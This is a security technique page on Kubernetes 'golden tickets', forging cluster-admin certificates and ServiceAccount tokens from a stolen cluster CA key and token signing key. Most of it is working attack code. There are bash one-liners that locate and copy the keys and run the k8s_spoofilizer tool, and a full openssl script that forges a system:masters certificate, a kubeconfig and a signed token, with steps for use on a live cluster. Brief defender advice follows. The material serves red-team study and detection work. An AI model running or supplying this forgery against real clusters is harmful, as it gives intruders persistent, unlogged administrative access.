Kubernetes Golden Tickets

Kubernetes Golden Tickets let an attacker who has obtained the cluster's CA private key (ca.key) and the ServiceAccount token signing key (sa.key) forge administrative user certificates, node certificates, and ServiceAccount tokens that the API server cannot tell apart from legitimately issued ones. The forged credentials never pass through a CertificateSigningRequest or TokenRequest, so nothing in the cluster records their creation, and they stay valid until the CA and signing key themselves are rotated.

Scripted solution

The following bash one-liners operationalize k8s_spoofilizer. They assume:

  • You have compromised a control plane node of a self-managed (non-cloud-provider-managed) Kubernetes cluster; managed offerings keep the control plane, and therefore these private keys, out of the customer's reach
  • You have access to (typically in /etc/kubernetes/pki/; in minikube it's /var/lib/minikube/certs):
    • ca.crt: the cluster Certificate Authority's public certificate
    • ca.key: the CA private key, used to sign and issue new certificates within the Kubernetes cluster
    • sa.key: the private key used to sign ServiceAccount tokens
# Search for these files
# Run this on the control plane node (2>/dev/null hides permission-denied noise from find)
find / \( -name "ca.crt" -o -name "ca.key" -o -name "sa.key" \) 2>/dev/null
# If everything is in /etc/kubernetes/pki...
# Copy them to key_dir
mkdir key_dir ; cp /etc/kubernetes/pki/ca.crt /etc/kubernetes/pki/sa.key /etc/kubernetes/pki/ca.key key_dir/
# Install pre-reqs (git for the clone, cryptography for the tool)
# Note you should probably use a virtual env for this; on Debian 12+/Ubuntu 23.04+ pip refuses
# a system-wide install unless you use a venv or uncomment --break-system-packages
sudo apt update && sudo apt install python3 python3-pip git -y ; git clone https://github.com/jtesta/k8s_spoofilizer ; pip install --user cryptography #--break-system-packages

# Set APISERVER to the IP of the API server (column 7 of "-o wide" is the pod IP;
# an HA cluster has one kube-apiserver pod per control plane node, so keep the first)
APISERVER=$(kubectl get pods -A -o wide | grep kube-apiserver | awk '{print $7}' | head -n1) && echo $APISERVER
# Or read the endpoint from the kubeconfig you already hold:
# kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}'

# Run k8s_spoofilizer.py
cd k8s_spoofilizer; ./k8s_spoofilizer.py --server https://$APISERVER:6443/ --update-uid-cache ../key_dir/
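As an added worked example (not from the page and not code from k8s_spoofilizer), the script below does by hand with openssl what the two golden tickets consist of: it signs a client certificate with ca.key whose O=system:masters makes the holder cluster-admin, wraps it in a kubeconfig, and signs a ServiceAccount JWT with sa.key in the bound-token layout kube-apiserver issues itself. Everything beyond the stolen keys is an assumption and labelled as such in the code: KEY_DIR defaults to a throwaway CA and SA key the script generates so it runs offline, the API server address 192.0.2.10 and the all-zero ServiceAccount UID are placeholders, and the issuer is the kubeadm default https://kubernetes.default.svc.cluster.local.

```shell
#!/usr/bin/env bash
# Added example, not from the page or from k8s_spoofilizer: forge both golden
# tickets by hand from ca.crt/ca.key/sa.key.  KEY_DIR normally points at the
# copied /etc/kubernetes/pki files; make_fake_pki builds a constructed stand-in
# so the script also runs offline.  Server address and UID below are placeholders.
set -eu

WORK="${WORK:-$(mktemp -d)}"
KEY_DIR="${KEY_DIR:-$WORK/key_dir}"

b64url() { openssl base64 -A | tr '+/' '-_' | tr -d '='; }

# Constructed stand-in for a compromised cluster CA and SA signing key.
make_fake_pki() {
  mkdir -p "$KEY_DIR"
  openssl req -x509 -newkey rsa:2048 -nodes -days 365 -subj "/CN=kubernetes" \
    -keyout "$KEY_DIR/ca.key" -out "$KEY_DIR/ca.crt" 2>/dev/null
  openssl genrsa -out "$KEY_DIR/sa.key" 2048 2>/dev/null
}

# Ticket 1: a client certificate signed by ca.key.  kube-apiserver takes the user
# name from CN and a group from every O= value, so O=system:masters is
# cluster-admin whatever the CN says.  No CSR object is ever created.
forge_admin_cert() {
  local user="${1:-kubernetes-admin}" group="${2:-system:masters}"
  openssl genrsa -out "$WORK/admin.key" 2048 2>/dev/null
  openssl req -new -key "$WORK/admin.key" -subj "/O=$group/CN=$user" \
    -out "$WORK/admin.csr" 2>/dev/null
  printf 'extendedKeyUsage=clientAuth\n' > "$WORK/ext.cnf"
  openssl x509 -req -in "$WORK/admin.csr" -CA "$KEY_DIR/ca.crt" \
    -CAkey "$KEY_DIR/ca.key" -CAcreateserial -days 3650 \
    -extfile "$WORK/ext.cnf" -out "$WORK/admin.crt" 2>/dev/null
  echo "$WORK/admin.crt"
}

# The same chain check the API server performs against its --client-ca-file.
admin_cert_is_valid() {
  openssl verify -CAfile "$KEY_DIR/ca.crt" "$WORK/admin.crt" >/dev/null 2>&1
}
admin_cert_subject() { openssl x509 -in "$WORK/admin.crt" -noout -subject; }

# Wrap the forged cert in a kubeconfig; the server URL is the caller's assumption.
write_kubeconfig() {
  local server="$1" out="$WORK/admin.kubeconfig"
  cat > "$out" <<EOF
apiVersion: v1
kind: Config
clusters:
- name: target
  cluster:
    server: $server
    certificate-authority-data: $(openssl base64 -A -in "$KEY_DIR/ca.crt")
users:
- name: forged-admin
  user:
    client-certificate-data: $(openssl base64 -A -in "$WORK/admin.crt")
    client-key-data: $(openssl base64 -A -in "$WORK/admin.key")
contexts:
- name: target
  context: {cluster: target, user: forged-admin}
current-context: target
EOF
  echo "$out"
}

# Ticket 2: a bound-style ServiceAccount JWT.  RS256 is PKCS#1 v1.5 over SHA-256,
# exactly what "openssl dgst -sha256 -sign" emits.  iss must equal the API
# server's --service-account-issuer (kubeadm default used here) and the uid must
# match the live ServiceAccount object, which is what --update-uid-cache is for.
forge_sa_token() {
  local ns="$1" name="$2" uid="$3" iss="${4:-https://kubernetes.default.svc.cluster.local}"
  local now kid hdr body sig
  now=$(date +%s)
  # kid as kube-apiserver derives it: base64url(SHA-256(DER SubjectPublicKeyInfo))
  kid=$(openssl rsa -in "$KEY_DIR/sa.key" -pubout -outform DER 2>/dev/null |
        openssl dgst -sha256 -binary | b64url)
  hdr=$(printf '{"alg":"RS256","kid":"%s"}' "$kid" | b64url)
  body=$(printf '{"aud":["%s"],"exp":%d,"iat":%d,"nbf":%d,"iss":"%s","kubernetes.io":{"namespace":"%s","serviceaccount":{"name":"%s","uid":"%s"}},"sub":"system:serviceaccount:%s:%s"}' \
    "$iss" $((now + 3600)) "$now" "$now" "$iss" "$ns" "$name" "$uid" "$ns" "$name" | b64url)
  sig=$(printf '%s.%s' "$hdr" "$body" | openssl dgst -sha256 -sign "$KEY_DIR/sa.key" | b64url)
  printf '%s.%s.%s\n' "$hdr" "$body" "$sig"
}

# Check a token the way the authenticator does: RS256 signature under sa.key's public half.
verify_sa_token() {
  local tok="$1" sig
  sig=${tok##*.}
  case $(( ${#sig} % 4 )) in 2) sig="$sig==" ;; 3) sig="$sig=" ;; esac
  printf '%s' "$sig" | tr '_-' '/+' | openssl base64 -d -A > "$WORK/sig.bin"
  openssl rsa -in "$KEY_DIR/sa.key" -pubout -out "$WORK/sa.pub" 2>/dev/null
  printf '%s' "${tok%.*}" | openssl dgst -sha256 -verify "$WORK/sa.pub" \
    -signature "$WORK/sig.bin" >/dev/null 2>&1
}

# Pull one top-level string claim (sub, iss) out of the payload; not a JSON parser.
token_claim() {
  local body=$1 claim=$2
  body=${body#*.}; body=${body%.*}
  case $(( ${#body} % 4 )) in 2) body="$body==" ;; 3) body="$body=" ;; esac
  printf '%s' "$body" | tr '_-' '/+' | openssl base64 -d -A |
    sed -n "s/.*\"$claim\":\"\([^\"]*\)\".*/\1/p"
}

main() {
  [ -f "$KEY_DIR/ca.key" ] || make_fake_pki
  forge_admin_cert >/dev/null
  admin_cert_is_valid && echo "admin cert: $(admin_cert_subject)"
  echo "kubeconfig: $(write_kubeconfig "https://${APISERVER:-192.0.2.10}:6443")"
  tok=$(forge_sa_token kube-system default 00000000-0000-0000-0000-000000000000)
  verify_sa_token "$tok" && echo "sa token for $(token_claim "$tok" sub): $tok"
}
if [ "${1:-}" = "--demo" ]; then main; fi
```

Run it as `KEY_DIR=./key_dir APISERVER=<api server ip> bash forge.sh --demo` against the copied PKI, and replace the placeholder UID with the real one (`kubectl -n kube-system get sa default -o jsonpath='{.metadata.uid}'`), since the token authenticator compares the uid claim to the live object and rejects a mismatch. From the defender's side the notable property is what is absent: the certificate corresponds to no CertificateSigningRequest and the JWT to no TokenRequest or Secret, so audit logs show only a "kubernetes-admin" in "system:masters" that nothing ever issued. Alert on system:masters use, and treat exposure of ca.key or sa.key as requiring rotation of those keys, because nothing short of that invalidates the tickets.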

References

  • https://www.positronsecurity.com/blog/2025-02-26-kubernetes-golden-tickets/
  • https://github.com/jtesta/k8s_spoofilizer
  • https://thegreycorner.com/2023/11/15/kubernetes-auth-deep-dive.html
  • https://raesene.github.io/blog/2022/12/21/Kubernetes-persistence-with-Tocan-and-Teisteanas/
  • https://github.com/raesene/teisteanas
  • https://raesene.github.io/blog/2019/04/16/kubernetes-certificate-auth-golden-key/